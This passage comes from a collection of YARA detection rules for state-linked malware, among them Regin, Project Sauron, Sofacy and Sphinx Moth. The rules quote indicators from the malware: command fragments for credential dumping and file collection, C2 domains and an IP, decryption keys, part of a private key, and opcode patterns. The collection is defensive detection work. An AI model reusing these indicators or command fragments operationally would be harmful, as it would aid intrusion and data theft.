"\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide $s6 = "ConnectMultiplePorts" fullword wide $s7 = "\\SYSTEMROOT" fullword wide $s8 = "IoWriteErrorLogEntry" fullword ascii $s9 = "KeQueryPerformanceCounter" fullword ascii $s10 = "KeServiceDescriptorTable" fullword ascii $s11 = "KeRemoveEntryDeviceQueue" fullword ascii $s12 = "SeSinglePrivilegeCheck" fullword ascii $s13 = "KeInitializeEvent" fullword ascii $s14 = "IoBuildDeviceIoControlRequest" fullword ascii $s15 = "KeRemoveDeviceQueue" fullword ascii $s16 = "IofCompleteRequest" fullword ascii $s17 = "KeInitializeSpinLock" fullword ascii $s18 = "MmIsNonPagedSystemAddressValid" fullword ascii $s19 = "IoCreateDevice" fullword ascii $s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii condition: all of them and filesize < 40KB and filesize > 30KB } rule Regin_Sample_Set_2 { meta: description = "Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935" author = "@MalwrSignatures" date = "27.11.14" hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be" hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935" strings: $hd = { fe ba dc fe } $s0 = "d%ls%ls" fullword wide $s1 = "\\\\?\\UNC" fullword wide $s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide $s3 = "\\\\?\\UNC\\" fullword wide $s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide $s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword $s6 = "\\\\.\\Global\\%s" fullword wide $s7 = "temp" fullword wide $s8 = "\\\\.\\%s" fullword wide $s9 = "Memory location: 0x%p, size 0x%08x" fullword wide $s10 = "sscanf" fullword ascii $s11 = "disp.dll" fullword ascii $s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii $s13 = "%d.%d.%d.%d%c" fullword ascii $s14 = "imagehlp.dll" fullword ascii $s15 = "%hd %d" fullword ascii condition: ( $hd at 0 ) and all of ($s*) and filesize < 450KB and filesize > 360KB } rule apt_regin_legspin { meta: copyright = "Kaspersky Lab" description = "Rule to detect Regin's Legspin module" version = "1.0" last_modified = "2015-01-22" reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/" md5 = "29105f46e4d33f66fee346cfd099d1cc" strings: $mz="MZ" $a1="sharepw" $a2="reglist" $a3="logdump" $a4="Name:" wide $a5="Phys Avail:" $a6="cmd.exe" wide $a7="ping.exe" wide $a8="millisecs" condition: ($mz at 0) and all of ($a*) } rule apt_regin_hopscotch { meta: copyright = "Kaspersky Lab" description = "Rule to detect Regin's Hopscotch module" version = "1.0" last_modified = "2015-01-22" reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/" md5 = "6c34031d7a5fc2b091b623981a8ae61c" strings: $mz="MZ" $a1="AuthenticateNetUseIpc" $a2="Failed to authenticate to" $a3="Failed to disconnect from" $a4="%S\\ipc$" wide $a5="Not deleting..." $a6="CopyServiceToRemoteMachine" $a7="DH Exchange failed" $a8="ConnectToNamedPipes" condition: ($mz at 0) and all of ($a*) } rule apt_regin_2011_32bit_stage1 { meta: copyright = "Kaspersky Lab" description = "Rule to detect Regin 32 bit stage 1 loaders" version = "1.0" last_modified = "2014-11-18" strings: $key1={331015EA261D38A7} $key2={9145A98BA37617DE} $key3={EF745F23AA67243D} $mz="MZ" condition: ($mz at 0) and any of ($key*) and filesize < 300000 } rule apt_regin_rc5key { meta: copyright = "Kaspersky Lab" description = "Rule to detect Regin RC5 decryption keys" version = "1.0" last_modified = "2014-11-18" strings: $key1={73 23 1F 43 93 E1 9F 2F 99 0C 17 81 5C FF B4 01} $key2={10 19 53 2A 11 ED A3 74 3F C3 72 3F 9D 94 3D 78} condition: any of ($key*) } rule apt_regin_vfs { meta: copyright = "Kaspersky Lab" author = "Kaspersky Lab" description = "Rule to detect Regin VFSes" version = "1.0" last_modified = "2014-11-18" strings: $a1={00 02 00 08 00 08 03 F6 D7 F3 52} $a2={00 10 F0 FF F0 FF 11 C7 7F E8 52} $a3={00 04 00 10 00 10 03 C2 D3 1C 93} $a4={00 04 00 10 C8 00 04 C8 93 06 D8} condition: ($a1 at 0) or ($a2 at 0) or ($a3 at 0) or ($a4 at 0) } rule apt_regin_dispatcher_disp_dll { meta: copyright = "Kaspersky Lab" author = "Kaspersky Lab" description = "Rule to detect Regin disp.dll dispatcher" version = "1.0" last_modified = "2014-11-18" strings: $mz="MZ" $string1="shit" $string2="disp.dll" $string3="255.255.255.255" $string4="StackWalk64" $string5="imagehlp.dll" condition: ($mz at 0) and (all of ($string*)) } rule apt_regin_2013_64bit_stage1 { meta: copyright = "Kaspersky Lab" description = "Rule to detect Regin 64 bit stage 1 loaders" version = "1.0" last_modified = "2014-11-18" filename="wshnetc.dll" md5="bddf5afbea2d0eed77f2ad4e9a4f044d" filename="wsharp.dll" md5="c053a0a3f1edcbbfc9b51bc640e808ce" strings: $mz="MZ" $a1="PRIVHEAD" $a2="\\\\.\\PhysicalDrive%d" $a3="ZwDeviceIoControlFile" condition: ($mz at 0) and (all of ($a*)) and filesize < 100000 } rule remsec_executable_blob_32 { meta: author = "remsec" strings: $code = { 31 06 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 F0 } condition: all of them } rule remsec_executable_blob_64 { meta: author = "remsec" strings: $code = { 31 06 48 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 EF } condition: all of them } rule remsec_executable_blob_parser { meta: author = "remsec" strings: $code ={ ( 0F 82 ?? ?? 00 00 | 72 ?? ) ( 81 | 41 81 ) ( 3? | 3C 24 | 7D 00 ) 02 AA 02 C1 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 8B | 41 8B | 44 8B | 45 8B ) ( 4? | 5? | 6? | 7? | ?4 24 | ?C 24 ) 06 } condition: all of them } rule remsec_encrypted_api { meta: author = "remsec" strings: $open_process ={ 91 9A 8F B0 9C 90 8D AF 8C 8C 9A FF } condition: all of them } rule remsec_packer_u { meta: author = "remsec" strings: $code={ 69 ( C? | D? | E? | F? ) AB 00 00 00 ( 81 | 41 81 ) C? CD 2B 00 00 ( F7 | 41 F7 ) E? ( C1 | 41 C1 ) E? 0D ( 69 | 45 69 ) ( C? | D? | E? | F? ) 85 CF 00 00 ( 29 | 41 29 | 44 29 | 45 29 | 2B | 41 2B | 44 2B | 45 2B )} condition: all of them } rule remsec_packer_B { meta: author = "remsec" strings: $code ={ 00 00 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) ( 44 88 6? 24 ?? | C6 44 24 ?? 00 ) 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) C7 44 24 ?? 0? 00 00 00 2B ?8 48 89 ?C 24 ?? 44 89 6? 24 ?? 83 C? 08 89 ?C 24 ?? ( FF | 41 FF ) D? ( 05 | 8D 88 ) 00 00 00 3A } condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule APT_Project_Sauron_Scripts { meta: description = "Detects scripts (mostly LUA) from Project Sauron report by Kaspersky" author = "Florian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-08" strings: $x1 = "local t = w.exec2str(\"regedit " $x2 = "local r = w.exec2str(\"cat" $x3 = "ap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licence" $x4 = "move O FakeVirtualEncryptedNetwork.dll" $x5 = "sinfo | basex b 32url | dext l 30" $x6 = "w.exec2str(execStr)" $x7 = "netnfo irc | basex b 32url" $x8 = "w.exec(\"wfw status\")" $x9 = "exec(\"samdump\")" $x10 = "cat VirtualEncryptedNetwork.ini|grep" $x11 = "if string.lower(k) == \"securityproviders\" then" $x12 = "exec2str(\"plist b | grep netsvcs\")" $x13 = ".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*" $x14 = "SAURON_KBLOG_KEY =" condition: 1 of them } rule APT_Project_Sauron_arping_module { meta: description = "Detects strings from arping module - Project Sauron report by Kaspersky" author = "Florian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-08" strings: $s1 = "Resolve hosts that answer" $s2 = "Print only replying Ips" $s3 = "Do not display MAC addresses" condition: all of them } rule APT_Project_Sauron_kblogi_module { meta: description = "Detects strings from kblogi module - Project Sauron report by Kaspersky" author = "Florian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-08" strings: $x1 = "Inject using process name or pid. Default" $s2 = "Convert mode: Read log from file and convert to text" $s3 = "Maximum running time in seconds" condition: $x1 or 2 of them } rule APT_Project_Sauron_basex_module { meta: description = "Detects strings from basex module - Project Sauron report by Kaspersky" author = "Florian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-08" strings: $x1 = "64, 64url, 32, 32url or 16." $s2 = "Force decoding when input is invalid/corrupt" $s3 = "This cruft" condition: $x1 or 2 of them } rule APT_Project_Sauron_dext_module { meta: description = "Detects strings from dext module - Project Sauron report by Kaspersky" author = "Florian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-08" strings: $x1 = "Assemble rows of DNS names back to a single string of data" $x2 = "removes checks of DNS names and lengths (during split)" $x3 = "Randomize data lengths (length/2 to length)" $x4 = "This cruft" condition: 2 of them } rule Hacktool_This_Cruft { meta: description = "Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report" author = "Florian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-08" score = 60 strings: $x1 = "This cruft" fullword condition: ( uint16(0) == 0x5a4d and filesize < 200KB and $x1 ) } /* Yara Rule Set Author: FLorian Roth Date: 2016-08-09 Identifier: Project Sauron - my own ruleset */ /* Rule Set ----------------------------------------------------------------- */ rule APT_Project_Sauron_Custom_M1 { meta: description = "Detects malware from Project Sauron APT" author = "FLorian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-09" hash1 = "9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9" strings: $s1 = "ncnfloc.dll" fullword wide $s4 = "Network Configuration Locator" fullword wide $op0 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 } /* Opcode */ $op1 = { 80 75 29 85 c9 79 25 b9 01 } /* Opcode */ $op2 = { 2b d8 48 89 7c 24 38 44 89 6c 24 40 83 c3 08 89 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( all of ($s*) ) and 1 of ($op*) ) or ( all of them ) } rule APT_Project_Sauron_Custom_M2 { meta: description = "Detects malware from Project Sauron APT" author = "FLorian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-09" hash1 = "30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8" strings: $s2 = "\\*\\3vpn" fullword ascii $op0 = { 55 8b ec 83 ec 0c 53 56 33 f6 39 75 08 57 89 75 } /* Opcode */ $op1 = { 59 59 c3 8b 65 e8 ff 75 88 ff 15 50 20 40 00 ff } /* Opcode */ $op2 = { 8b 4f 06 85 c9 74 14 83 f9 12 0f 82 a7 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 400KB and ( all of ($s*) ) and all of ($op*) ) } rule APT_Project_Sauron_Custom_M3 { meta: description = "Detects malware from Project Sauron APT" author = "FLorian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-09" hash1 = "a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec" strings: $s1 = "ExampleProject.dll" fullword ascii $op0 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 ba } /* Opcode */ $op1 = { ff 15 34 20 00 10 85 c0 59 a3 60 30 00 10 75 04 } /* Opcode */ $op2 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 00 20 00 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and ( all of ($s*) ) and all of ($op*) ) } rule APT_Project_Sauron_Custom_M4 { meta: description = "Detects malware from Project Sauron APT" author = "FLorian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-09" hash1 = "e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57" strings: $s1 = "xpsmngr.dll" fullword wide $s2 = "XPS Manager" fullword wide $op0 = { 89 4d e8 89 4d ec 89 4d f0 ff d2 3d 08 00 00 c6 } /* Opcode */ $op1 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 04 20 5b } /* Opcode */ $op2 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 b6 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 90KB and ( all of ($s*) ) and 1 of ($op*) ) or ( all of them ) } rule APT_Project_Sauron_Custom_M6 { meta: description = "Detects malware from Project Sauron APT" author = "FLorian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-09" hash1 = "3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8" strings: $s1 = "rseceng.dll" fullword wide $s2 = "Remote Security Engine" fullword wide $op0 = { 8b 0d d5 1d 00 00 85 c9 0f 8e a2 } /* Opcode */ $op1 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 } /* Opcode */ $op2 = { 80 75 29 85 c9 79 25 b9 01 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( all of ($s*) ) and 1 of ($op*) ) or ( all of them ) } rule APT_Project_Sauron_Custom_M7 { meta: description = "Detects malware from Project Sauron APT" author = "FLorian Roth" reference = "https://goo.gl/eFoP4A" date = "2016-08-09" hash1 = "6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd" hash2 = "7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca" strings: $sx1 = "Default user" fullword wide $sx2 = "Hincorrect header check" fullword ascii /* Typo */ $sa1 = "MSAOSSPC.dll" fullword ascii $sa2 = "MSAOSSPC.DLL" fullword wide $sa3 = "MSAOSSPC" fullword wide $sa4 = "AOL Security Package" fullword wide $sa5 = "AOL Security Package" fullword wide $sa6 = "AOL Client for 32 bit platforms" fullword wide $op0 = { 8b ce 5b e9 4b ff ff ff 55 8b ec 51 53 8b 5d 08 } /* Opcode */ $op1 = { e8 0a fe ff ff 8b 4d 14 89 46 04 89 41 04 8b 45 } /* Opcode */ $op2 = { e9 29 ff ff ff 83 7d fc 00 0f 84 cf 0a 00 00 8b } /* Opcode */ $op3 = { 83 f8 0c 0f 85 3a 01 00 00 44 2b 41 6c 41 8b c9 } /* Opcode */ $op4 = { 44 39 57 0c 0f 84 d6 0c 00 00 44 89 6f 18 45 89 } /* Opcode */ $op5 = { c1 ed 02 83 c6 fe e9 68 fe ff ff 44 39 57 08 75 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 200KB and (( 3 of ($s*) and 3 of ($op*) ) or ( 1 of ($sx*) and 1 of ($sa*) )) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Scieron { meta: author = "Symantec Security Response" ref = "http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012" date = "22.01.15" strings: // .text:10002069 66 83 F8 2C cmp ax, ',' // .text:1000206D 74 0C jz short loc_1000207B // .text:1000206F 66 83 F8 3B cmp ax, ';' // .text:10002073 74 06 jz short loc_1000207B // .text:10002075 66 83 F8 7C cmp ax, '|' // .text:10002079 75 05 jnz short loc_10002080 $code1 = {66 83 F? 2C 74 0C 66 83 F? 3B 74 06 66 83 F? 7C 75 05} // .text:10001D83 83 F8 09 cmp eax, 9 ; switch 10 cases // .text:10001D86 0F 87 DB 00 00 00 ja loc_10001E67 ; jumptable 10001D8C default case // .text:10001D8C FF 24 85 55 1F 00+ jmp ds:off_10001F55[eax*4] ; switch jump $code2 = {83 F? 09 0F 87 ?? 0? 00 00 FF 24} $str1 = "IP_PADDING_DATA" wide ascii $str2 = "PORT_NUM" wide ascii condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule SeaDuke_Sample { meta: description = "SeaDuke Malware - file 3eb86b7b067c296ef53e4857a74e09f12c2b84b666fc130d1f58aec18bc74b0d" author = "Florian Roth" reference = "http://goo.gl/MJ0c2M" date = "2015-07-14" score = 70 hash = "d2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e" strings: $s0 = "bpython27.dll" fullword ascii $s1 = "email.header(" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "LogonUI.exe" fullword wide /* PEStudio Blacklist: strings */ $s3 = "Crypto.Cipher.AES(" fullword ascii /* PEStudio Blacklist: strings */ $s4 = "mod is NULL - %s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 4000KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule SNOWGLOBE_Babar_Malware { meta: description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe" author = "Florian Roth" reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france" date = "2015/02/18" hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36" score = 80 strings: $mz = { 4d 5a } $z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword $z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword $z2 = "ExecQueryFailled!" fullword ascii $z3 = "NBOT_COMMAND_LINE" fullword $z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword $s1 = "/s /n %s \"%s\"" fullword ascii $s2 = "%%WINDIR%%\\%s\\%s" fullword ascii $s3 = "/c start /wait " fullword ascii $s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii $x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii $x2 = "%COMMON_APPDATA%" fullword ascii $x4 = "CONOUT$" fullword ascii $x5 = "cmd.exe" fullword ascii $x6 = "DLLPATH" fullword ascii condition: ( $mz at 0 ) and filesize < 1MB and (( 1 of ($z*) and 1 of ($x*) ) or ( 3 of ($s*) and 4 of ($x*) ) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_sofacy_xtunnel { meta: author = "Claudio Guarnieri" description = "Sofacy Malware - German Bundestag" score = 75 strings: $xaps = ":\\PROJECT\\XAPS_" $variant11 = "XAPS_OBJECTIVE.dll" $variant12 = "start" $variant21 = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0" $variant22 = "is you live?" $mix1 = "176.31.112.10" $mix2 = "error in select, errno %d" $mix3 = "no msg" $mix4 = "is you live?" $mix5 = "127.0.0.1" $mix6 = "err %d" $mix7 = "i`m wait" $mix8 = "hello" $mix9 = "OpenSSL 1.0.1e 11 Feb 2013" $mix10 = "Xtunnel.exe" condition: ((uint16(0) == 0x5A4D) or (uint16(0) == 0xCFD0)) and (($xaps) or (all of ($variant1*)) or (all of ($variant2*)) or (6 of ($mix*))) } rule Sofacy_Bundestag_Winexe { meta: description = "Winexe tool used by Sofacy group in Bundestag APT" author = "Florian Roth" reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf" date = "2015-06-19" hash = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d" score = 70 strings: $s1 = "\\\\.\\pipe\\ahexec" fullword ascii $s2 = "implevel" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 115KB and all of them } rule Sofacy_Bundestag_Mal2 { meta: description = "Sofacy Group Malware Sample 2" author = "Florian Roth" reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf" date = "2015-06-19" hash = "566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092" score = 70 strings: $x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii $x2 = "XAPS_OBJECTIVE.dll" fullword ascii $s1 = "i`m wait" fullword ascii condition: uint16(0) == 0x5a4d and ( 1 of ($x*) ) and $s1 } rule Sofacy_Bundestag_Mal3 { meta: description = "Sofacy Group Malware Sample 3" author = "Florian Roth" reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf" date = "2015-06-19" hash = "5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1" score = 70 strings: $s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" fullword ascii $s2 = ".?AVAgentModuleRemoteKeyLogger@@" fullword ascii $s3 = "<font size=4 color=red>process isn't exist</font>" fullword ascii $s4 = "<font size=4 color=red>process is exist</font>" fullword ascii $s5 = ".winnt.check-fix.com" fullword ascii $s6 = ".update.adobeincorp.com" fullword ascii $s7 = ".microsoft.checkwinframe.com" fullword ascii $s8 = "adobeincorp.com" fullword wide $s9 = "# EXC: HttpSender - Cannot create Get Channel!" fullword ascii $x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide $x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide $x3 = "C:\\Windows\\System32\\cmd.exe" fullword wide condition: uint16(0) == 0x5a4d and filesize < 300KB and ( 2 of ($s*) or ( 1 of ($s*) and all of ($x*) )) } rule Sofacy_Bundestag_Batch { meta: description = "Sofacy Bundestags APT Batch Script" author = "Florian Roth" reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf" date = "2015-06-19" score = 70 strings: $s1 = "for %%G in (.pdf, .xls, .xlsx, .doc, .docx) do (" ascii $s2 = "cmd /c copy" $s3 = "forfiles" condition: filesize < 10KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-02-13 Identifier: Sofacy Fysbis */ rule Sofacy_Fybis_ELF_Backdoor_Gen1 { meta: description = "Detects Sofacy Fysbis Linux Backdoor_Naikon_APT_Sample1" author = "Florian Roth" reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" date = "2016-02-13" score = 80 hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592" hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb" strings: $x1 = "Your command not writed to pipe" fullword ascii $x2 = "Terminal don`t started for executing command" fullword ascii $x3 = "Command will have end with \\n" fullword ascii $s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" fullword ascii $s2 = "Success execute command or long for waiting executing your command" fullword ascii $s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" fullword ascii $s4 = "rm -f /usr/lib/systemd/system/" fullword ascii $s5 = "ExecStart=" fullword ascii $s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 500KB and 1 of ($x*) ) or ( 1 of ($x*) and 3 of ($s*) ) } rule Sofacy_Fysbis_ELF_Backdoor_Gen2 { meta: description = "Detects Sofacy Fysbis Linux Backdoor" author = "Florian Roth" reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" date = "2016-02-13" score = 80 hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592" hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb" hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61" strings: $s1 = "RemoteShell" ascii $s2 = "basic_string::_M_replace_dispatch" fullword ascii $s3 = "HttpChannel" ascii condition: uint16(0) == 0x457f and filesize < 500KB and all of them } /* Yara Rule Set Author: Florian Roth Date: 2016-06-14 Identifier: Sofacy June 2016 */ /* Rule Set ----------------------------------------------------------------- */ rule Sofacy_Jun16_Sample1 { meta: description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report" author = "Florian Roth" reference = "http://goo.gl/mzAa97" date = "2016-06-14" score = 85 hash1 = "be1cfa10fcf2668ae01b98579b345ebe87dab77b6b1581c368d1aba9fd2f10a0" strings: $s1 = "clconfg.dll" fullword ascii $s2 = "ASijnoKGszdpodPPiaoaghj8127391" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($s*) ) ) or ( all of them ) } rule Sofacy_Jun16_Sample2 { meta: description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report" author = "Florian Roth" reference = "http://goo.gl/mzAa97" date = "2016-06-14" score = 85 hash1 = "57d230ddaf92e2d0504e5bb12abf52062114fb8980c5ecc413116b1d6ffedf1b" hash2 = "69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261" hash3 = "aeeab3272a2ed2157ebf67f74c00fafc787a2b9bbaa17a03be1e23d4cb273632" strings: $x1 = "DGMNOEP" fullword ascii $x2 = "/%s%s%s/?%s=" fullword ascii $s1 = "Control Panel\\Dehttps=https://%snetwork.proxy.ht2" fullword ascii $s2 = "http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9" fullword ascii $s3 = "svchost.dll" fullword wide $s4 = "clconfig.dll" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 100KB and ( all of ($x*) ) ) or ( 3 of them ) } rule Sofacy_Jun16_Sample3 { meta: description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report" author = "Florian Roth" reference = "http://goo.gl/mzAa97" date = "2016-06-14" score = 85 hash1 = "c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785" strings: $s1 = "ASLIiasiuqpssuqkl713h" fullword wide condition: uint16(0) == 0x5a4d and filesize < 200KB and $s1 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Kudelski Security (modified by Florian Roth) Reference: https://www.kudelskisecurity.com/sites/default/files/sphinx_moth_cfc_report.pdf Date: 2015-11-23 Identifier: Sphinx Moth */ rule Sphinx_Moth_cudacrt { meta: description = "sphinx moth threat group file cudacrt.dll" author = "Kudelski Security - Nagravision SA" reference = "www.kudelskisecurity.com" date = "2015-08-06" strings: $s0 = "HPSSOEx.dll" fullword wide $s1 = "255.255.255.254" fullword wide $s2 = "SOFTWARE\\SsoAuth\\Service" fullword wide $op0 = { ff 15 5f de 00 00 48 8b f8 48 85 c0 75 0d 48 8b } /* Opcode */ $op1 = { 45 33 c9 4c 8d 05 a7 07 00 00 33 d2 33 c9 ff 15 } /* Opcode */ $op2 = { e8 7a 1c 00 00 83 f8 01 74 17 b9 03 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 243KB and all of ($s*) and 1 of ($op*) } rule Sphinx_Moth_h2t { meta: description = "sphinx moth threat group file h2t.dat" author = "Kudelski Security - Nagravision SA (modified by Florian Roth)" reference = "www.kudelskisecurity.com" date = "2015-08-06" strings: $x1 = "%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd]" fullword ascii $s1 = "[-] Error in connection() %d - %s" fullword ascii $s2 = "[-] Child process exit." fullword ascii $s3 = "POST http://%s:%s/ HTTP/1.1" fullword ascii $s4 = "pipe() to" fullword ascii $s5 = "pipe() from" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 156KB and ($x1 or all of ($s*)) } rule Sphinx_Moth_iastor32 { meta: description = "sphinx moth threat group file iastor32.exe" author = "Kudelski Security - Nagravision SA" reference = "www.kudelskisecurity.com" date = "2015-08-06" strings: $s0 = "MIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nN" fullword ascii /* private key */ $s1 = "iAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z" fullword ascii /* private key */ condition: uint16(0) == 0x5a4d and filesize < 2000KB and all of them } rule Sphinx_Moth_kerberos32 { meta: description = "sphinx moth threat group file kerberos32.dll" author = "Kudelski Security - Nagravision SA (modified by Florian Roth)" reference = "www.kudelskisecurity.com" date = "2015-08-06" strings: $x1 = "%WINDIR%\\ativpsrz.bin" fullword ascii $x2 = "%WINDIR%\\ativpsrn.bin" fullword ascii $x3 = "kerberos32.dll" fullword wide $x4 = "KERBEROS64.dll" fullword ascii $x5 = "kerberos%d.dll" fullword ascii $s1 = "\\\\.\\pipe\\lsassp" fullword ascii $s2 = "LSASS secure pipe" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "NullSessionPipes" fullword ascii /* PEStudio Blacklist: strings */ $s4 = "getlog" fullword ascii $s5 = "startlog" fullword ascii /* PEStudio Blacklist: strings */ $s6 = "stoplog" fullword ascii /* PEStudio Blacklist: strings */ $s7 = "Unsupported OS (%d)" fullword ascii /* PEStudio 